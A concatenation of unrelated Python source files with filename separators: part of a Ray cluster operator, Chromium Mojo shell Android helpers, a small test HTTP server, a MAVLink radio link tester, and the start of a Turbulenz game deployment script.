logger.exception(f"{log_prefix}: Error while updating RayCluster.")
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_ERROR))
elif event_type == "DELETED":
# Don't try to update CRD's status if the CRD is gone.
logger.exception(
f"Error while deleting RayCluster {cluster_name}.")
def cluster_action(event_type: str, cluster_cr: Dict[str, Any],
cluster_name: str, cluster_namespace: str) -> None:
cluster_config = operator_utils.cr_to_config(cluster_cr)
cluster_identifier = (cluster_name, cluster_namespace)
log_prefix = ",".join(cluster_identifier)
if event_type == "ADDED":
operator_utils.check_redis_password_not_specified(
cluster_config, cluster_identifier)
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_UPDATING))
ray_cluster = RayCluster(cluster_config)
# Track changes to the custom resource's spec field:
generation = cluster_cr["metadata"]["generation"]
ray_cluster.set_generation(generation)
logger.info(f"{log_prefix}: Launching cluster.")
ray_cluster.create_or_update()
ray_clusters[cluster_identifier] = ray_cluster
cluster_status_q.put((cluster_name, cluster_namespace, STATUS_RUNNING))
elif event_type == "MODIFIED":
ray_cluster = ray_clusters[cluster_identifier]
# Check metadata.generation to determine if there's a spec change.
current_generation = cluster_cr["metadata"]["generation"]
# Check metadata.labels.autoscalerRetries to see if we need to restart
# Ray processes.
status = cluster_cr.get("status", {})
autoscaler_retries = status.get(AUTOSCALER_RETRIES_FIELD, 0)
# True if there's been a chamge to the spec of the custom resource,
# triggering an increment of metadata.generation:
spec_changed = current_generation > ray_cluster.get_generation()
# True if monitor has failed, triggering an increment of
# status.autoscalerRetries:
ray_restart_required = (autoscaler_retries >
ray_cluster.get_num_retries())
if ray_restart_required:
logger.error(f"{log_prefix}: Failed, restarting cluster.")
ray_cluster.set_num_retries(autoscaler_retries)
if spec_changed:
logger.info(f"{log_prefix}: Updating cluster.")
ray_cluster.set_generation(current_generation)
# Update if there's been a change to the spec or if we're attempting
# recovery from autoscaler failure.
if spec_changed or ray_restart_required:
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_UPDATING))
ray_cluster.set_config(cluster_config)
# Trigger Ray restart only if there's been a failure.
ray_cluster.create_or_update(restart_ray=ray_restart_required)
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_RUNNING))
elif event_type == "DELETED":
ray_cluster = ray_clusters[cluster_identifier]
ray_cluster.clean_up()
del ray_clusters[cluster_identifier]
def status_handling_loop():
while True:
cluster_name, cluster_namespace, phase = cluster_status_q.get()
try:
operator_utils.set_status(cluster_name, cluster_namespace, phase)
except Exception:
log_prefix = ",".join([cluster_name, cluster_namespace])
logger.exception(f"{log_prefix}: Error setting RayCluster status.")
def main() -> None:
# Run status-handling loop.
status_handler = threading.Thread(target=status_handling_loop, daemon=True)
status_handler.start()
# Make directory for Ray cluster configs
if not os.path.isdir(operator_utils.RAY_CONFIG_DIR):
os.mkdir(operator_utils.RAY_CONFIG_DIR)
while True:
# This outer loop waits for creation of a RayCluster CRD if it hasn't
# already been created.
try:
# Enter main event loop.
run_event_loop()
except ApiException as e:
if e.status == 404:
logger.warning("Waiting for creation of the RayCluster CRD")
time.sleep(5)
else:
logger.error("Failed to enter operator event loop.")
# Unforeseen startup error. Operator pod is
# likely to end up in a crash loop.
raise
if __name__ == "__main__":
main()
|
android.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import atexit
import json
import logging
import os
import os.path
import subprocess
import sys
import threading
import time
import SimpleHTTPServer
import SocketServer
from mopy.config import Config
from mopy.paths import Paths
sys.path.insert(0, os.path.join(Paths().src_root, 'build', 'android'))
from pylib import android_commands
from pylib import constants
from pylib import forwarder
# Tags used by the mojo shell application logs.
LOGCAT_TAGS = [
'AndroidHandler',
'MojoFileHelper',
'MojoMain',
'MojoShellActivity',
'MojoShellApplication',
'chromium',
]
MOJO_SHELL_PACKAGE_NAME = 'org.chromium.mojo.shell'
class Context(object):
"""
The context object allowing to run multiple runs of the shell.
"""
def __init__(self, device, device_port):
self.device = device
self.device_port = device_port
class _SilentTCPServer(SocketServer.TCPServer):
"""
A TCPServer that won't display any error, unless debugging is enabled. This is
useful because the client might stop while it is fetching an URL, which causes
spurious error messages.
"""
def handle_error(self, request, client_address):
"""
Override the base class method to have conditional logging.
"""
if logging.getLogger().isEnabledFor(logging.DEBUG):
super(_SilentTCPServer, self).handle_error(request, client_address)
def _GetHandlerClassForPath(base_path):
class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""
Handler for SocketServer.TCPServer that will serve the files from
|base_path| directory over http.
"""
def translate_path(self, path):
path_from_current = (
SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path))
return os.path.join(base_path, os.path.relpath(path_from_current))
def log_message(self, *_):
"""
Override the base class method to disable logging.
"""
pass
return RequestHandler
def _ExitIfNeeded(process):
"""
Exits |process| if it is still alive.
"""
if process.poll() is None:
process.kill()
def _ReadFifo(context, fifo_path, pipe, on_fifo_closed, max_attempts=5):
"""
Reads |fifo_path| on the device and write the contents to |pipe|. Calls
|on_fifo_closed| when the fifo is closed. This method will try to find the
path up to |max_attempts|, waiting 1 second between each attempt. If it cannot
find |fifo_path|, a exception will be raised.
"""
def Run():
def _WaitForFifo():
for _ in xrange(max_attempts):
if context.device.FileExistsOnDevice(fifo_path):
return
time.sleep(1)
if on_fifo_closed:
on_fifo_closed()
raise Exception("Unable to find fifo.")
_WaitForFifo()
stdout_cat = subprocess.Popen([constants.GetAdbPath(),
'shell',
'cat',
fifo_path],
stdout=pipe)
atexit.register(_ExitIfNeeded, stdout_cat)
stdout_cat.wait()
if on_fifo_closed:
on_fifo_closed()
thread = threading.Thread(target=Run, name="StdoutRedirector")
thread.start()
def PrepareShellRun(config):
"""
Returns a context allowing a shell to be run.
This will start an internal http server to serve mojo applications, forward a
local port on the device to this http server and install the current version
of the mojo shell.
"""
build_dir = Paths(config).build_dir
constants.SetOutputDirectort(build_dir)
httpd = _SilentTCPServer(('127.0.0.1', 0), _GetHandlerClassForPath(build_dir))
atexit.register(httpd.shutdown)
host_port = httpd.server_address[1]
http_thread = threading.Thread(target=httpd.serve_forever)
http_thread.daemon = True
http_thread.start()
device = android_commands.AndroidCommands(
android_commands.GetAttachedDevices()[0])
device.EnableAdbRoot()
device.ManagedInstall(os.path.join(build_dir, 'apks', 'MojoShell.apk'),
keep_data=True,
package_name=MOJO_SHELL_PACKAGE_NAME)
atexit.register(forwarder.Forwarder.UnmapAllDevicePorts, device)
forwarder.Forwarder.Map([(0, host_port)], device)
context = Context(device,
forwarder.Forwarder.DevicePortForHostPort(host_port))
atexit.register(StopShell, context)
return context
def StartShell(context, arguments, stdout=None, on_application_stop=None):
"""
Starts the mojo shell, passing it the given arguments.
If stdout is not None, it should be a valid argument for subprocess.Popen.
"""
STDOUT_PIPE = "/data/data/%s/stdout.fifo" % MOJO_SHELL_PACKAGE_NAME
cmd = [constants.GetAdbPath(),
'shell',
'am',
'start',
'-W',
'-S',
'-a', 'android.intent.action.VIEW',
'-n', '%s/.MojoShellActivity' % MOJO_SHELL_PACKAGE_NAME]
parameters = ['--origin=http://127.0.0.1:%d/' % context.device_port]
if stdout or on_application_stop:
context.device.RunShellCommand('rm %s' % STDOUT_PIPE)
parameters.append('--fifo-path=%s' % STDOUT_PIPE)
_ReadFifo(context, STDOUT_PIPE, stdout, on_application_stop)
parameters += arguments
if parameters:
encodedParameters = json.dumps(parameters)
cmd += [ '--es', 'encodedParameters', encodedParameters]
with open(os.devnull, 'w') as devnull:
subprocess.Popen(cmd, stdout=devnull).wait()
def StopShell(context):
"""
Stops the mojo shell.
"""
context.device.RunShellCommand('am force-stop %s' % MOJO_SHELL_PACKAGE_NAME)
def CleanLogs(context):
"""
Cleans the logs on the device.
"""
context.device.RunShellCommand('logcat -c')
def ShowLogs():
"""
Displays the log for the mojo shell.
Returns the process responsible for reading the logs.
"""
logcat = subprocess.Popen([constants.GetAdbPath(),
'logcat',
'-s',
' '.join(LOGCAT_TAGS)],
stdout=sys.stdout)
atexit.register(_ExitIfNeeded, logcat)
return logcat
def GetFilePath(filename):
"""
Returns a path suitable for the application to create a file.
"""
return '/data/data/%s/files/%s' % (MOJO_SHELL_PACKAGE_NAME, filename)
|
test_server.py
|
import logging
from threading import Thread
from http.server import HTTPServer, BaseHTTPRequestHandler
logging.basicConfig(level=logging.NOTSET)
logger = logging.getLogger("test_web_server")
reply_payload = "default reply"
class RequestHandler(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
logger.info(
"GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)
)
self._set_response()
self.wfile.write(reply_payload.encode("utf-8"))
def do_POST(self):
pass
class TestServer:
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
def run(
self, reply, server_class=HTTPServer, handler_class=RequestHandler, port=8000
):
global reply_payload
reply_payload = reply
server_address = ("", port)
self.httpd = server_class(server_address, handler_class)
self.httpd.timeout = 2
logger.info("Starting httpd...\n")
def serve_forever(httpd):
with httpd:
httpd.serve_forever()
self.thread = Thread(target=serve_forever, args=(self.httpd,))
self.thread.setDaemon(True)
self.thread.start()
if __name__ == "__main__":
from sys import argv
TestServer().run()
|
mavtester.py
|
#!/usr/bin/env python
'''
test MAVLink performance between two radios
'''
import sys, time, os, threading, Queue
from optparse import OptionParser
parser = OptionParser("mavtester.py [options]")
parser.add_option("--baudrate", type='int',
help="connection baud rate", default=57600)
parser.add_option("--port1", default=None, help="serial port 1")
parser.add_option("--port2", default=None, help="serial port 2")
parser.add_option("--rate", default=4, type='float', help="initial stream rate")
parser.add_option("--override-rate", default=1, type='float', help="RC_OVERRIDE rate")
parser.add_option("--show", action='store_true', default=False, help="show messages")
parser.add_option("--rtscts", action='store_true', default=False, help="enable RTSCTS hardware flow control")
parser.add_option("--mav20", action='store_true', default=False, help="enable MAVLink2")
parser.add_option("--key", default=None, help="MAVLink2 signing key")
parser.add_option("--swap", action='store_true', help="swap port1/port2")
(opts, args) = parser.parse_args()
if opts.mav20:
os.environ['MAVLINK20'] = '1'
from pymavlink import mavutil
if opts.port1 is None or opts.port2 is None:
print("You must specify two serial ports")
sys.exit(1)
# create GCS connection
if opts.swap:
port1 = opts.port2
port2 = opts.port1
else:
port1 = opts.port1
port2 = opts.port2
gcs = mavutil.mavlink_connection(port1, baud=opts.baudrate, input=True)
gcs.setup_logfile('gcs.tlog')
vehicle = mavutil.mavlink_connection(port2, baud=opts.baudrate, input=False)
vehicle.setup_logfile('vehicle.tlog')
print("Draining ports")
gcs.port.timeout = 1
vehicle.port.timeout = 1
while True:
r = gcs.port.read(1024)
if not r:
break
print("Drained %u bytes from gcs" % len(r))
time.sleep(0.01)
while True:
r = vehicle.port.read(1024)
if not r:
break
print("Drained %u bytes from vehicle" % len(r))
time.sleep(0.01)
if opts.rtscts:
print("Enabling RTSCTS")
gcs.set_rtscts(True)
vehicle.set_rtscts(True)
else:
gcs.set_rtscts(False)
vehicle.set_rtscts(False)
def allow_unsigned(mav, msgId):
'''see if an unsigned packet should be allowed'''
allow = {
mavutil.mavlink.MAVLINK_MSG_ID_RADIO : True,
mavutil.mavlink.MAVLINK_MSG_ID_RADIO_STATUS : True
}
if msgId in allow:
return True
return False
if opts.mav20 and opts.key is not None:
import hashlib
h = hashlib.new('sha256')
h.update(opts.key)
key = h.digest()
gcs.setup_signing(key, sign_outgoing=True, allow_unsigned_callback=allow_unsigned)
vehicle.setup_signing(key, sign_outgoing=True, allow_unsigned_callback=allow_unsigned)
# we use thread based receive to avoid problems with serial buffer overflow in the Linux kernel.
def receive_thread(mav, q):
'''continuously receive packets are put them in the queue'''
last_pkt = time.time()
while True:
m = mav.recv_match(blocking=False)
if m is not None:
q.put(m)
last_pkt = time.time()
# start receive threads for the
print("Starting threads")
gcs_queue = Queue.Queue()
gcs_thread = threading.Thread(target=receive_thread, args=(gcs, gcs_queue))
gcs_thread.daemon = True
gcs_thread.start()
vehicle_queue = Queue.Queue()
vehicle_thread = threading.Thread(target=receive_thread, args=(vehicle, vehicle_queue))
vehicle_thread.daemon = True
vehicle_thread.start()
start_time = time.time()
last_vehicle_send = time.time()
last_gcs_send = time.time()
last_override_send = time.time()
vehicle_lat = 0
gcs_lat = 0
def send_telemetry():
'''
send telemetry packets from the vehicle to
the GCS. This emulates the typical pattern of telemetry in
ArduPlane 2.75 in AUTO mode
'''
global last_vehicle_send, vehicle_lat
now = time.time()
# send at rate specified by user. This doesn't do rate adjustment yet (APM does adjustment
# based on RADIO packets)
if now - last_vehicle_send < 1.0/opts.rate:
return
last_vehicle_send = now
time_usec = int((now - start_time) * 1.0e6)
time_ms = time_usec // 1000
vehicle.mav.heartbeat_send(1, 3, 217, 10, 4, 3)
vehicle.mav.global_position_int_send(time_ms, vehicle_lat, 1491642131, 737900, 140830, 2008, -433, 224, 35616)
vehicle.mav.rc_channels_scaled_send(time_boot_ms=time_ms, port=0, chan1_scaled=280, chan2_scaled=3278, chan3_scaled=-3023, chan4_scaled=0, chan5_scaled=0, chan6_scaled=0, chan7_scaled=0, chan8_scaled=0, rssi=0)
if opts.mav20:
vehicle.mav.servo_output_raw_send(time_usec=time_usec, port=0, servo1_raw=1470, servo2_raw=1628, servo3_raw=1479, servo4_raw=1506, servo5_raw=1500, servo6_raw=1556, servo7_raw=1500, servo8_raw=1500,
servo9_raw=1500, servo10_raw=1500, servo11_raw=1500, servo12_raw=1500, servo13_raw=1500, servo14_raw=1500, servo15_raw=1500, servo16_raw=1500)
else:
vehicle.mav.servo_output_raw_send(time_usec=time_usec, port=0, servo1_raw=1470, servo2_raw=1628, servo3_raw=1479, servo4_raw=1506, servo5_raw=1500, servo6_raw=1556, servo7_raw=1500, servo8_raw=1500)
vehicle.mav.rc_channels_raw_send(time_boot_ms=time_ms, port=0, chan1_raw=1470, chan2_raw=1618, chan3_raw=1440, chan4_raw=1509, chan5_raw=1168, chan6_raw=1556, chan7_raw=1224, chan8_raw=994, rssi=0)
vehicle.mav.raw_imu_send(time_usec, 562, 382, -3917, -3330, 3445, 35, -24, 226, -523)
vehicle.mav.scaled_pressure_send(time_boot_ms=time_ms, press_abs=950.770019531, press_diff=-0.0989062488079, temperature=463)
vehicle.mav.sensor_offsets_send(mag_ofs_x=-68, mag_ofs_y=-143, mag_ofs_z=-34, mag_declination=0.206146687269, raw_press=95077, raw_temp=463, gyro_cal_x=-0.063114002347, gyro_cal_y=0.0479440018535, gyro_cal_z=0.0190890002996, accel_cal_x=0.418922990561, accel_cal_y=0.284875005484, accel_cal_z=-0.436598002911)
vehicle.mav.sys_status_send(onboard_control_sensors_present=64559, onboard_control_sensors_enabled=64559, onboard_control_sensors_health=64559, load=82, voltage_battery=11877, current_battery=0, battery_remaining=100, drop_rate_comm=0, errors_comm=0, errors_count1=0, errors_count2=0, errors_count3=0, errors_count4=0)
vehicle.mav.mission_current_send(seq=1)
vehicle.mav.gps_raw_int_send(time_usec=time_usec, fix_type=3, lat=-353637616, lon=1491642012, alt=737900, eph=169, epv=65535, vel=2055, cog=34782, satellites_visible=9)
vehicle.mav.nav_controller_output_send(nav_roll=0.0, nav_pitch=0.319999992847, nav_bearing=-18, target_bearing=343, wp_dist=383, alt_error=-37.0900001526, aspd_error=404.800537109, xtrack_error=1.52732038498)
vehicle.mav.attitude_send(time_boot_ms=time_ms, roll=0.00283912196755, pitch=-0.0538846850395, yaw=-0.0708072632551, rollspeed=0.226980209351, pitchspeed=-0.00743395090103, yawspeed=-0.154820173979)
vehicle.mav.vfr_hud_send(airspeed=21.9519939423, groundspeed=20.5499992371, heading=355, throttle=35, alt=737.900024414, climb=-0.784280121326)
vehicle.mav.ahrs_send(omegaIx=0.000540865410585, omegaIy=-0.00631708558649, omegaIz=0.00380697473884, accel_weight=0.0, renorm_val=0.0, error_rp=0.094664350152, error_yaw=0.0121578350663)
vehicle.mav.hwstatus_send(Vcc=0, I2Cerr=0)
vehicle.mav.wind_send(direction=27.729429245, speed=5.35723495483, speed_z=-1.92264056206)
vehicle_lat += 1
def send_GCS():
'''
send GCS heartbeat messages
'''
global last_gcs_send
now = time.time()
if now - last_gcs_send < 1.0:
return
gcs.mav.heartbeat_send(1, 6, 0, 0, 0, 0)
last_gcs_send = now
def send_override():
'''
send RC_CHANNELS_OVERRIDE messages from GCS
'''
global last_override_send
now = time.time()
if opts.override_rate == 0:
return
if now - last_override_send < 1.0/opts.override_rate:
return
time_ms = int((now - start_time) * 1.0e3)
time_ms_low = time_ms % 65536
time_ms_high = (time_ms - time_ms_low) // 65536
gcs.mav.rc_channels_override_send(1, 2, time_ms_low, time_ms_high, 0, 0, 0, 0, 0, 0)
last_override_send = now
def process_override(m):
'''
process an incoming RC_CHANNELS_OVERRIDE message, measuring latency
'''
now = time.time()
time_ms_sent = m.chan2_raw*65536 + m.chan1_raw
time_ms = int((now - start_time) * 1.0e3)
latency = time_ms - time_ms_sent
stats.latency_count += 1
stats.latency_total += latency
if stats.latency_min == 0 or latency < stats.latency_min:
stats.latency_min = latency
if latency > stats.latency_max:
stats.latency_max = latency
def recv_vehicle():
'''
receive packets in the vehicle
'''
try:
m = vehicle_queue.get(block=False)
except Queue.Empty:
return False
if m.get_type() == 'BAD_DATA':
stats.vehicle_bad_data += 1
return True
if opts.show:
print(m)
stats.vehicle_received += 1
if m.get_type() in ['RADIO','RADIO_STATUS']:
#print('VRADIO: ', str(m))
stats.vehicle_radio_received += 1
stats.vehicle_txbuf = m.txbuf
stats.vehicle_fixed = m.fixed
stats.vehicle_rssi = m.rssi
stats.vehicle_noise = m.noise
if m.get_type() == 'RC_CHANNELS_OVERRIDE':
process_override(m)
return True
def recv_GCS():
'''
receive packets in the GCS
'''
try:
m = gcs_queue.get(block=False)
except Queue.Empty:
return False
if m.get_type() == 'BAD_DATA':
stats.gcs_bad_data += 1
return True
if m.get_type() == 'GLOBAL_POSITION_INT':
global gcs_lat
if gcs_lat != m.lat:
print("Lost %u GLOBAL_POSITION_INT messages" % (m.lat - gcs_lat))
gcs_lat = m.lat
gcs_lat += 1
if opts.show:
print(m)
stats.gcs_received += 1
if m.get_type() in ['RADIO','RADIO_STATUS']:
#print('GRADIO: ', str(m))
stats.gcs_radio_received += 1
stats.gcs_txbuf = m.txbuf
stats.gcs_fixed = m.fixed
stats.gcs_rssi = m.rssi
stats.gcs_noise = m.noise
return True
class PacketStats(object):
'''
class to hold statistics on the link
'''
def __init__(self):
self.gcs_sent = 0
self.vehicle_sent = 0
self.gcs_received = 0
self.vehicle_received = 0
self.gcs_radio_received = 0
self.vehicle_radio_received = 0
self.gcs_last_bytes_sent = 0
self.vehicle_last_bytes_sent = 0
self.latency_count = 0
self.latency_total = 0
self.latency_min = 0
self.latency_max = 0
self.vehicle_bad_data = 0
self.gcs_bad_data = 0
self.last_gcs_radio = None
self.last_vehicle_radio = None
self.vehicle_txbuf = 100
self.gcs_txbuf = 100
self.vehicle_rssi = 0
self.gcs_rssi = 0
self.vehicle_noise = 0
self.gcs_noise = 0
self.vehicle_fixed = 0
self.gcs_fixed = 0
def __str__(self):
gcs_bytes_sent = gcs.mav.total_bytes_sent - self.gcs_last_bytes_sent
vehicle_bytes_sent = vehicle.mav.total_bytes_sent - self.vehicle_last_bytes_sent
self.gcs_last_bytes_sent = gcs.mav.total_bytes_sent
self.vehicle_last_bytes_sent = vehicle.mav.total_bytes_sent
avg_latency = 0
if stats.latency_count != 0:
avg_latency = stats.latency_total / stats.latency_count
return "Veh:%u/%u/%u GCS:%u/%u/%u pend:%u rates:%u/%u lat:%u/%u/%u bad:%u/%u txbuf:%u/%u rssi:%u/%u noise:%u/%u loss:%u:%u%%/%u:%u%% fixed:%u/%u" % (
self.vehicle_sent,
self.vehicle_received,
self.vehicle_received - self.vehicle_radio_received,
self.gcs_sent,
self.gcs_received,
self.gcs_received - self.gcs_radio_received,
self.vehicle_sent - (self.gcs_received - self.gcs_radio_received),
gcs_bytes_sent,
vehicle_bytes_sent,
stats.latency_min,
stats.latency_max,
avg_latency,
self.vehicle_bad_data,
self.gcs_bad_data,
self.vehicle_txbuf,
self.gcs_txbuf,
self.vehicle_rssi,
self.gcs_rssi,
self.vehicle_noise,
self.gcs_noise,
gcs.mav_loss,
gcs.packet_loss(),
vehicle.mav_loss,
vehicle.packet_loss(),
stats.vehicle_fixed,
stats.gcs_fixed)
'''
main code
'''
last_report = time.time()
stats = PacketStats()
while True:
send_telemetry()
stats.vehicle_sent = vehicle.mav.total_packets_sent
send_GCS()
send_override()
stats.gcs_sent = gcs.mav.total_packets_sent
while True:
recv1 = recv_vehicle()
recv2 = recv_GCS()
if not recv1 and not recv2:
break
if time.time() - last_report >= 1.0:
print(stats)
last_report = time.time()
|
deploygame.py
|
#!/usr/bin/env python
# Copyright (c) 2011-2014 Turbulenz Limited
import logging
import locale
import mimetypes
from os.path import exists as path_exists, dirname as path_dirname, basename as path_basename, abspath as path_abspath
from optparse import OptionParser, TitledHelpFormatter
from urllib3 import connection_from_url
from urllib3.exceptions import HTTPError, SSLError
from simplejson import loads as json_loads
from threading import Thread
from time import sleep, time
from re import compile as re_compile
from sys import stdin, stdout
from getpass import getpass, GetPassWarning
from math import modf
from turbulenz_local.models.game import Game, GameError
from turbulenz_local.lib.deploy import Deployment
__version__ = '1.0.3'
HUB_COOKIE_NAME = 'hub'
HUB_URL = 'https://hub.turbulenz.com/'
# pylint: disable=C0301
USERNAME_PATTERN = re_compile('^[a-z0-9]+[a-z0-9-]*$') # usernames
PROJECT_SLUG_PATTERN = re_compile('^[a-zA-Z0-9\-]*$') # game and versions
PROJECT_VERSION_PATTERN = re_compile('^[a-zA-Z0-9\-\.]*$') # game and versions
# pylint: enable=C0301
def log(message, new_line=True):
message = message.encode(stdout.encoding or 'UTF-8', 'ignore')
print ' >> %s' % message,
if new_line:
print
def error(message):
log('[ERROR] - %s' % message)
def warning(message):
log('[WARNING] - %s' % message)
def _add_missing_mime_types():
mimetypes.add_type('application/vnd.turbulenz', '.tzjs')
mimetypes.add_type('application/json', '.json')
mimetypes.add_type('image/dds', '.dds')
mimetypes.add_type('image/tga', '.tga')
mimetypes.add_type('image/ktx', '.ktx')
mimetypes.add_type('image/x-icon', '.ico')
mimetypes.add_type('text/cgfx', '.cgfx')
mimetypes.add_type('application/javascript', '.js')
mimetypes.add_type('application/ogg', '.ogg')
mimetypes.add_type('image/png', '.png')
mimetypes.add_type('text/x-yaml', '.yaml')
mimetypes.add_type('image/svg+xml', '.svg')
mimetypes.add_type('image/pjpeg', '.jpg')
mimetypes.add_type('video/webm', '.webm')
mimetypes.add_type('video/mp4', '.mp4')
mimetypes.add_type('video/mp4', '.m4v')
mimetypes.add_type('audio/aac', '.aac')
mimetypes.add_type('audio/mpeg', '.mp3')
mimetypes.add_type('audio/mp4', '.m4a')
mimetypes.add_type('application/tar', '.tar')
mimetypes.add_type('text/css', '.css')
def _create_parser():
parser = OptionParser(description='Deploy game from Local to the Hub',
formatter=TitledHelpFormatter())
parser.add_option("--version", action="store_true", dest="output_version", default=False,
help="output version number")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False, help="verbose output")
parser.add_option("-s", "--silent", action="store_true", dest="silent", default=False, help="silent running")
parser.add_option("-i", "--input", action="store", dest="input", help="manifest file for the game to be deployed")
parser.add_option("-u", "--user", action="store", dest="user", help="login username")
parser.add_option("-p", "--password", action="store", dest="password",
help="login password (will be requested if not provided)")
parser.add_option("--project", action="store", dest="project", help="project to deploy to")
parser.add_option("--projectversion", action="store", dest="projectversion", help="project version to deploy to")
parser.add_option("--projectversiontitle", action="store", dest="projectversiontitle",
help="project version title, for existing project versions this will overwrite the existing " \
"title if supplied. For new versions this defaults to the project version")
parser.add_option("-c", "--cache", action="store", dest="cache", help="folder to be used for caching")
parser.add_option("--hub", action="store", dest="hub", default=HUB_URL,
help="Hub url (defaults to https://hub.turbulenz.com/)")
parser.add_option("--ultra", action="store_true", dest="ultra", default=False,
help="use maximum compression. Will take MUCH longer. May reduce file size by an extra 10%-20%.")
return parser
def _check_options():
parser = _create_parser()
(options, _args) = parser.parse_args()
if options.output_version:
print __version__
exit(0)
if options.silent:
logging.basicConfig(level=logging.CRITICAL)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.WARNING)
manifest_file = options.input
if not manifest_file:
error('No manifest file specified!')
#parser.print_help()
exit(-1)
if not path_exists(manifest_file):
error('Expecting an existing manifest file, "%s" does not exist!' % manifest_file)
#parser.print_help()
exit(-1)
cache_folder = options.cache
if not cache_folder:
error('Expecting a cache folder!')
parser.print_help()
exit(-1)
if not path_exists(cache_folder):
error('Expecting an existing cache folder, "%s" does not exist!' % cache_folder)
exit(-1)
username = options.user
if not username:
error('Login information required!')
parser.print_help()
exit(-1)
if not options.password:
try:
options.password = getpass()
except GetPassWarning:
error('Echo free password entry unsupported. Please provide a --password argument')
parser.print_help()
return -1
if not USERNAME_PATTERN.match(username):
error('Incorrect "username" format!')
exit(-1)
project = options.project
if not project:
error('Hub project required!')
parser.print_help()
exit(-1)
if not PROJECT_SLUG_PATTERN.match(project):
error('Incorrect "project" format!')
exit(-1)
projectversion = options.projectversion
if not projectversion:
error('Hub project version required!')
parser.print_help()
exit(-1)
if not PROJECT_VERSION_PATTERN.match(projectversion):
error('Incorrect "projectversion" format!')
exit(-1)
if options.projectversiontitle is not None:
options.projectversiontitle = options.projectversiontitle.decode('UTF-8')
if len(options.projectversiontitle) > 48:
error('"projectversiontitle" too long (max length 48 characters)!')
exit(-1)
if options.hub is None:
options.hub = 'http://127.0.0.1:8080'
return options
def login(connection, options):
username = options.user
password = options.password
if not options.silent:
log('Login as "%s".' % username)
credentials = {'login': username,
'password': password,
'source': '/tool'}
try:
r = connection.request('POST',
'/dynamic/login',
fields=credentials,
retries=1,
redirect=False)
except (HTTPError, SSLError):
error('Connection to Hub failed!')
exit(-1)
if r.status != 200:
if r.status == 301:
redirect_location = r.headers.get('location', '')
end_domain = redirect_location.find('/dynamic/login')
error('Login is being redirected to "%s". Please verify the Hub URL.' % redirect_location[:end_domain])
else:
error('Wrong user login information!')
exit(-1)
cookie = r.headers.get('set-cookie', None)
login_info = json_loads(r.data)
# pylint: disable=E1103
if not cookie or HUB_COOKIE_NAME not in cookie or login_info.get('source') != credentials['source']:
error('Hub login failed!')
exit(-1)
# pylint: enable=E1103
return cookie
def logout(connection, cookie):
try:
connection.request('POST',
'/dynamic/logout',
headers={'Cookie': cookie},
redirect=False)
except (HTTPError, SSLError) as e:
error(str(e))
def _check_project(connection, options, cookie):
project = options.project
projectversion = options.projectversion
projectversion_title = options.projectversiontitle
try:
r = connection.request('POST',
'/dynamic/upload/projects',
headers={'Cookie': cookie},
redirect=False)
except (HTTPError, SSLError) as e:
error(e)
exit(-1)
if r.status != 200:
error('Wrong Hub answer!')
exit(-1)
# pylint: disable=E1103
projects = json_loads(r.data).get('projects', [])
# pylint: enable=E1103
upload_access = False
new_version = True
for project_info in projects:
if project_info['slug'] == project:
upload_access = True
for version_info in project_info['versions']:
if version_info['version'] == projectversion:
new_version = False
# Use the supplied project version title or the existing one as a fallback
existingversion_title = version_info['title']
projectversion_title = projectversion_title or existingversion_title
break
# If projectversion_title is still unset this is a new version with no supplied title, default to the version
projectversion_title = projectversion_title or projectversion
if not upload_access:
error('Project "%s" does not exist or you are not authorized to upload new versions!' % project)
exit(-1)
if not options.silent:
if new_version:
log('Uploading to new version "%s" on project "%s".' % (projectversion, project))
else:
log('Uploading to existing version "%s" on project "%s".' % (projectversion, project))
if projectversion_title != existingversion_title:
log('Changing project version title from "%s" to "%s".' % (existingversion_title,
projectversion_title))
return (project, projectversion, projectversion_title)
def _get_cookie_value(cookie):
for cookie_pair in cookie.split(';'):
if HUB_COOKIE_NAME in cookie_pair:
return cookie_pair
error('Wrong cookie: %s' % cookie)
exit(-1)
def _fmt_value(value):
return locale.format('%lu', value, grouping=True)
def _fmt_time(seconds):
hours = 0
minutes = 0
milliseconds, seconds = modf(seconds)
milliseconds = int(milliseconds * 1000)
if seconds > 3600:
hours = int(seconds / 3600)
seconds -= (hours * 3600)
if seconds > 60:
minutes = int(seconds / 60)
seconds -= (minutes * 60)
return '%02d:%02d:%02d.%03d' % (hours, minutes, seconds, milliseconds)
def _check_game(game):
def log_issues(issues):
for key, items in issues.iteritems():
log('Issues in %s:' % key)
for item in items:
log('- %s:' % item[0])
for value in item[1].get('errors', []):
error(value)
for value in item[1].get('warnings', []):
warning(value)
complete, issues = game.check_completeness()
if not complete:
log_issues(issues)
exit(-1)
issues, critical = game.validate_yaml()
if issues:
log_issues(issues)
if critical:
exit(-1)
log('If you still want to deploy, the missing values will be replaced by default ones.')
log('Deploy? (Y/N) ', False)
if stdin.readline().strip()[0] not in 'yY':
exit(-1)
def _progress(deploy_info, silent, verbose):
if silent:
sleep_step = 1.0
elif verbose:
log('Scanning and compressing:')
sleep_step = 0.2
else:
log('Scanning and compressing files...')
sleep_step = 0.4
old_num_bytes = 0
old_uploaded_bytes = 0
while True:
sleep(sleep_step)
if deploy_info.error:
error(deploy_info.error)
return -1
if not silent:
current_num_bytes = deploy_info.num_bytes
current_uploaded_bytes = deploy_info.uploaded_bytes
if old_num_bytes != current_num_bytes or old_uploaded_bytes != current_uploaded_bytes:
if verbose:
total_files = deploy_info.total_files
if current_uploaded_bytes == 0:
log(' %u/%u (%s bytes)' % (deploy_info.num_files,
total_files,
_fmt_value(current_num_bytes)))
else:
if old_uploaded_bytes == 0:
if old_num_bytes < current_num_bytes:
log(' %u/%u (%s bytes)' % (deploy_info.num_files,
total_files,
_fmt_value(current_num_bytes)))
log('Uploading modified files:')
